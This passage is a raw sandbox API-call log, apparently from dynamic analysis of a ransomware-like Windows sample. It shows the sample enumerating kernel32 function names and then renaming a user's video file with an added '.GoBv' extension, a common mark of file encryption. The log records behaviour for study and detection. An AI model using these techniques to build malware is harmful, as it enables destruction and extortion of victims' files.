[0087.760] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.760] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.760] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.760] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.760] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.761] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.761] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.761] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.761] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.761] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.761] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.761] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.761] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.761] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.761] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.761] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.761] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.761] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.761] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.761] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.761] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.761] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.761] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.761] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.761] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.762] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.762] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.762] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.762] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.762] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.762] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.762] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.762] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.762] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.762] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.762] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.762] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.762] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.762] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.762] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.763] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.763] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.763] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.763] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.763] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.763] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.763] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.763] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.763] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.763] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.763] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.763] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.763] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.763] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.763] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.763] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.763] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.763] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.763] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.763] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.764] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.764] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.764] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.764] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.764] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.764] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.764] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.764] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.764] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.764] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.764] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.764] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.764] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.764] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.764] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.764] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.764] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.764] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.764] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.764] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.765] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.765] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.765] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.765] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.765] lstrlenA (lpString="DELETEATOM") returned 10 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.765] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.765] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.765] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.765] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.765] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.765] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.765] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.765] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.765] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.765] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.765] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.765] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.765] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.765] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.765] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.766] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.766] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.766] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.766] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.766] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.766] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.766] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.766] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.766] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.766] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.766] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.766] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.766] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.766] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.766] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.766] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.766] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.766] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.766] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.767] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.767] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.767] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.767] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.767] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.767] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.767] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.767] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.767] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4") returned 45 [0087.767] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4.GoBv") returned 50 [0087.767] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxfs.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4.GoBv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxfs.mp4.gobv"), dwFlags=0x0) returned 1 [0087.769] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.769] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.769] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.769] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb52c05c0, ftCreationTime.dwHighDateTime=0x1d4cd3c, ftLastAccessTime.dwLowDateTime=0x886fa1b0, ftLastAccessTime.dwHighDateTime=0x1d4d50f, ftLastWriteTime.dwLowDateTime=0x886fa1b0, ftLastWriteTime.dwHighDateTime=0x1d4d50f, 